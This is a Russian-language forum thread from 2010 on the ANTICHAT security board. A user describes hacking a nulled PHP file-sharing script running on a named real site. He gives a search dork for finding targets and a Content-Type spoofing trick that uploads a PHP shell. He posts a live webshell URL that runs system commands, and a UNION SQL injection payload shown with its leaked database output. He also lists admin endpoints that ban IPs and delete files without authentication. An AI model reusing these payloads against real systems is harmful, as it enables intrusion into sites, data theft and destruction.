HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.09.2010, 20:12
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Тестил вот этот, зануленый

http://www.nulled.ws/attachment.php?attachmentid=15074&d=1225918711

Реги там нет, сам невижу что там, мне emillord дал ссыль на свой обменик, я захекал

Заливаем .php файл с phpinfo() и скачиваем, предлагает сохранить, но там будет результат

Если скрипт ругается, что недопустимый тип:

Скрипт берёт mime type из массива $_FILES а там mime type берётся из вашего запроса к серверу, сниффаем, меняем

Content-Type: ocet/stream (или чего оно там у вас)

на

Content-Type: text/plain

пых файл заливается, запускается... всё

исходники вам показать немогу, лень и нет у меня их, нет реги на нулледе, но emillord сказал он тама качал

ну как-то так...

===========

дорк inurl:view-file.html?file=

первая ссылка - ломаеца как задумывалось

токо я из phpinfo взял прямой путь, вот

http://www.sharefile.org/storage/1iecwexb3ibhfsc2ubceacg7zwitr5.php?c=echo%20'%3Cpr e%3E';system('ls%20-al');%20exit;

какой-то школьник снёс
 
Ответить с цитированием

  #2  
Старый 15.09.2010, 20:39
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Ну вон оно

process-multi-upload.php

какая-то там строка

$contenttype = $_FILES['Filedata']['type'];

Тама ещё по ходу и скуля....

view-file.html

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$file_ex[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$file_ex[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

...

[/
COLOR][COLOR="#0000BB"]$get_file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT dateadded, originalfilename, filename, filesize, password, description, originalext, totalviews, status FROM files WHERE id = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIMIT 1"[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR
но мне лень щупать да и зачем если шелл льётся

Любопытство сильнее лени

view-file.html?file=-1%20UNION%20SELECT%20null,null,null,null,null,conc at_ws(0x3a,version(),database(),user()),null,null, null%23

Код:
Code:
http://www.sharefile.org/view-file.html?file=-1%20UNION%20SELECT%20null,null,null,null,null,concat_ws(0x3a,version(),database(),user()),null,null,null%23
Код:
Code:
Comments: 5.0.67-community:admin_sharefileorg:admin_juzi@localhost
вот так например

А ещё там есть проверка на

$_SESSION[sess_isadmin] == 'yes'

через соседей если подменим сессию, будем одминами...

Но нафиг надо

А ещё при register_globals в footer.php XSS

$site_url,$site_name,$theme_path(нет, не инклуд... по крайней мере не в этом файле)

Всё, я срочно убежал гамать

таки вернулся...

admin-ban-ip.html

нет проверки на админство... ну он где-то есть, но я не стал искать, в скрипт сначала делает, потом проверяет

Ну короче

admin-ban-ip.html?banipsubmit=1&banip=1.1.1.1 - забаним ip 1.1.1.1

будет редирект, но IP Добавится

открыл следующий файл - скуля... и удаление файлов

admin-home.html?d={SQL или ID файла} - удалит ID и SQL Inj

не, это уже извращенство, смысла щупать нет, там всё дырявое
 
Ответить с цитированием

  #3  
Старый 16.09.2010, 19:16
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Тема спущена с РОА
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ